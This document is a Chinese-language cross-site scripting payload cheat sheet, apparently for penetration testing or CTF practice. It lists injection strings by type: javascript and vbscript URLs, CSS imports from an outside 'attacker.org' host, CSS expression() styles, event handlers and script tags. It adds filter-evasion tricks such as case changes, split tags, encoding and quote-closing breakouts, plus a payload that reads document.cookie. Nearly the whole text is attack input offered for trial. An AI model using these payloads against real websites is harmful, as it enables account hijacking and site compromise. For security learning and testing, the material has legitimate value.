1.5 XSS Payload
第一类:Javascript URL
<a href="javascript:alert(‘test‘)">link</a>
<a href="javascript:alert(‘xss‘)">link</a>
<a href=‘vbscript:MsgBox("XSS")‘>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript:alert(1)">Hello</a>
第二类:CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port‘\ja\vasc\ript:alert("XSS")‘;</STYLE>
<STYLE>@import‘http://jb51.net/xss.css‘;</STYLE>
第三类:Inline style
<div style="color: expression(alert(‘XSS‘))">
<div style=color:expression\(alert(1))></div>
<div style="color: ‘<‘; color: expression(alert(‘XSS‘))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
第四类:JavaScript 事件
<div onclick="alert(‘xss‘)">
<div onmouseenter="alert(‘xss‘)">
<div onclick ="alert(‘xss‘)">
<BODY ONLOAD=alert(‘XSS‘)>
<img src=1 onerror=alert(1)>
<img/src=‘1‘/onerror=alert(0)>
第五类:Script 标签
<script src="http://baidu.com"></script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
一个一个试,推理一下
DOM型,存储型,反射性,大小写绕过,黑名单绕过,编码绕过,onclick事件绕过
关键词:闭合字符,alert,script,<>,',",(),URL编码,ASCII/10进制转换
<script>alert(1)</script>
alert(/xss/)
";alert(/xss/)//
"><script>alert('xss')</script><"
<script>alert(document.cookie)</script>
<Script>alert("ANY")</Script>
"> <Script>alert('handsome boy')</script> //
<scr<script>ipt>alert("ANY")</scr</script>ipt>
<img src=1 onerror=alert("ANY")>
"> <scscriptript>alert`xss`</scscriptript> //
oninput=alert`1`
<a herf="x" onclick="alert(/xss/)">test</a>
"<script>alert('xss')</script>"
" onchange='alert(1)' "
<script>AlerT("ANY")</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>
oninput=alert`1`
"> <a href="javascript:%61lert(1)">click me</a> //